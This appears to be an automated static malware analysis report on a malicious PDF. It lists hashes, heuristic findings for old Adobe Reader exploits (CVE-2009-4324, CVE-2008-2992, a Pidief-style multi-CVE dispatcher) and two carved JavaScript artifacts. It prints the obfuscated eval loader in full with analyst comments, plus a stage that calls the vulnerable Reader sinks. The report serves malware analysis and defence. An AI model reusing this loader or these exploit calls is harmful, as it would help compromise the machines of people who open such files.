Malicious PDF — malware analysis report

Static analysis result for SHA-256 cb00aed60b8ebda0…

MALICIOUS

PDF

7.4 KB · Created: 2010-10-12 13:53:08 · Authoring application: Fpibiwwesomehogoze (via 3819bCatzoxajaira) · First seen: 2026-05-09
MD5: d82bf01c47032703a0ffaf78684a0962 SHA-1: 7621f5e4373087d9d3bfcf542bcee2cf8b8a0333 SHA-256: cb00aed60b8ebda0a7788222cd65fcd487604ff808e962bb7dc63eee439b494e
Risk score: 288

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (7)

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0011_000.js pdf-javascript-stream PDF /JS object 11 at offset 0x136B 2418 bytes
SHA-256: 3ec80c91a9e437ea3498918fabeaea3a810badd46e7c4fcc483beeb49c072eff
Preview script
Up to the first 1,000 lines of the extracted script
// Analyst annotation of the carved loader (code left byte-for-byte as carved).
// Structure: a block of JS source is hidden inside hSP behind filler characters,
// the filler is stripped with a regex, and the cleaned text is handed to eval,
// whose name is itself assembled by reversing "lave".
var hMZ = null;

try {

var zSD=300; // recursion ceiling used by x.prototype.fQF below

var pWH=0; // zero: loop lower bound and the starting counter value
var pMN=new String("leng"+"th"); // "length" — property names are split so the literal keyword never appears
var fCH=''; // empty string: reverse-accumulator seed and the replace() substitute
var tKJI="Func"+"tion"; // "Function" — not referenced anywhere else in this listing
var oXSP=/[\!\|\>%@_~78#]/g; // character class of the filler bytes sprinkled through hSP
function x(nOH){this.nYZ=this.r=nOH}; // holder object: keeps its argument as both this.r and this.nYZ
var xQD=new String("rep"+"lac"+"e"); // "replace"
var rAV=new String("charA"+"t"); // "charAt"
var lSB=this; // the enclosing scope object (presumably the Acrobat document/global context — TODO confirm)

function tYN(pOT,pQN){return pOT+pQN}; // plain concatenation helper

// hSP: the next stage's source, padded with the filler matched by oXSP. With the
// filler removed it begins "var gBAL=this.r;" and builds the names
// "getPageN"+"thWord" / "getPageN"+"umWords", which is consistent with the
// getPageWords-XOR stage carved separately as legacy_pdfkit_stage_000.js.
var hSP="va%r_ ~g|B8A#L8=7t|h#i|s_.>r8;~d~=%\'8g~e#t8P|a7g!e7N!\'7;%t8K~J8=#d@+@\'%t|h~W_o!r8d%\'%;|t8W8X|=>d8+|\'#u8m!W~o_r!d|s%\'|;>l|C!J@=8\'8p7a%g_e>N!u!m_\'@;>b~I7N8 |=% !1%3%9! |;%f7C|H8=7\'%\'%;#p|G@T#=~\'!j~o8i>n@\'!;_b7Q_T7=!\'_\'!;>p@W!H8=>0#;~r>C!Z~O_=%S|t8r!i@n|g%;#b_E%R!=8\'!s~u~b%s@t_r7\'!;#h7Q@Z|=>\'!e_v@a7l|\'|;@p#M@N7=|\'7l~e>n#g_t|h8\'@;_z#O!F_=|\'%\\_\\@x|\'#;!x!U@H|=>\'!t!o!S#t7r!i@n@g#\'7;>f7G8X|=|\'~p~a>r@s|e8I>n7t>\'8;7s@Z@Q!B@=_\'_f_r#o!m_C!h>a%r8C~o@d>e@\'_;@t#E!J@=#\'7c7h7a#r@C7o7d7e#A%t%\'|;#v7W%D7=|4|/_4%;7d@K#H_=!1#+~4#;|l%=@2|070|+%5_5>;@l7S_B7=_\'%d7o7c|\'~;~b|M7F8=|383!28;~r|C~J|=8[7]8;~f!O!D|=>\'~\'%;_r!U>F%=~1>6~;%l7Q!P8=_2_;>p@E!B@=>4_;#x_I8L%=>g|B>A%L8[@t%W!X7]|(!g|B!A>L![7l%C_J8]%)#;>f@o8r!(>d@I~X@=8p>W|H>;>d_I8X!<# _x8I|L>;| 7d7I>X>+~+~)8{%v@a_r8 7t@O8Z%=#g!B%A#L#[#t_K!J#]8(_g%B_A!L@[~l_C>J|]!,|d!I8X~,|t7r7u~e|)8;>b#Q|T!=>[%b7Q|T>,8t>O%Z>]![!p%G!T|]8(7f~C7H7)~;%;8}!f#o_r#(_d7I|X!=~0~;7d7I@X8 @<% 8b@Q8T![%p>M>N#]7;! !d%I8X8+>=%l>Q!P>)%{_v!E%X%=>b%Q>T>[@b_E7R~]!(%d>I%X7,|l8Q@P|)%;8t>A#V7=|p#a@r%s|e7I|n~t!(_v_E#X@,@r~U>F%)#;|p_M>F7=%t%A>V|^%b>I|N~;%n#M>H%=8p%M7F!.7t!o#S>t%r!i>n_g8(|r|U>F#)7;@n_M~H#=_(~n~M_H|[!p@M7N_]_=#=~v!W%D|)8 |?@ ~\'707\'> _+7 !n@M#H# |:! |n|M~H7;~r#C8J!.%p%u8s_h!(|n7M|H@)>;_}8t8r>y# 7{!f@O!D_=_n>e7w% 7S!t~r!i>n~g@(>z_O!F! ~+7 %r@C8J![7p>G7T@]8(7z@O%F#)~)@;%a7p!p#[@h_Q%Z#]8(!\'7f!O%D%=#\"!\'>+>f|O!D_+#\'8\"7;%\'>)|;~g7B|A!L@.7b7Q|B~=!(#f@O!D|[8b~E%R~]@(%f~O~D#[7p|M_N|]_-_b7M!F#)|)>;@g@B#A_L@.#n7M!Z%=7(>f|O_D7[@b7E_R@]7(_p|W_H|,>f|O!D#[8p|M8N!]7->b#M>F|)|)>;#d@Q@B~(@)~;|}_ ~c8a~t#c8h>(~b@C|N#)!{%i>f~(|g%B7A>L%.#n7M7Z|)!{#t_r#y_ ~{#a>p!p_[>h!Q%Z!]8(%g|B@A_L!.>n_M%Z@)>;|}> #c~a>t8c7h|(>b@C~N!)!{#a8p%p7.#a!l_e~r!t~(!b>C>N!)!;|}|}! @e~l!s8e% 7{#a#p#p_.@a_l@e_r!t@(7\'@N%O! 8C8O~D>E#\'7)@;>}#}!";
var vWD=1; // step added on each recursive call in fQF
;


// Returns jQB reversed: walks from index jQB.length (charAt there yields "") down
// to 0, appending one character per step. zSX and dIX are assigned without
// declaration and so leak as implicit globals.
function rOX(jQB){zSX=fCH; for(dIX=jQB[pMN];dIX >= pWH;dIX--) zSX=tYN(zSX, jQB[rAV](dIX)); return zSX}



hQZ=rOX("la"+"ve"); // "eval", produced by reversal so the token never appears literally
hSP=hSP[xQD](oXSP, fCH); // hSP.replace(oXSP, '') — strips the filler, leaving the stage source
;


x.prototype={

// Recurses through the global instance hMZ, adding vWD to pEH each call, until pEH
// exceeds zSD (300); then calls this.r["eval"](hSP), evaluating the decoded stage
// in the held scope. The ~300-deep recursion before the eval is presumably a
// delay / anti-emulation measure — inference, not visible in the code.
fQF : function(pEH){

if(pEH > zSD){

this.r[hQZ](hSP);

} else {

hMZ.fQF(pEH+vWD);

}
}
};

var hMZ=new x(lSB); // instance bound to the enclosing scope; fQF reaches it by this global name
hMZ.fQF(pWH); // start the counter at 0

} catch(fOD){
// Every error is swallowed: a failed stage produces no visible error in the viewer.
}
legacy_pdfkit_stage_000.js deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 153 bytes
SHA-256: 18699f9d55ae1f1fd22bc427d0f09ac790fd8fafb1557dc66370fe40318c5f52
Detection
ClamAV: No threats found — a signature miss on this carved artifact does not offset the heuristic and ML findings recorded above.
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
Up to the first 1,000 lines of the extracted script
/* getPageWords-XOR Pidief stage normalized */
// Normalized view of the recovered stage (code left as carved). The four
// statements below are the Reader API sinks scored in the heuristics section;
// the per-version branching described there is not present in this flattened form.
app.viewerVersion; // bare viewer-version probe; in the Pidief template this value selects the sink branch (see heuristics)
Collab.getIcon("N."+unescape("%09")); // Collab.getIcon sink; the argument is "N." followed by a tab (unescape("%09"))
media.newPlayer(null); // media.newPlayer sink — CVE-2009-4324 per the heuristics above
util.printf("%45000f", 1); // util.printf with a 45000-wide format specifier — CVE-2008-2992 per the heuristics above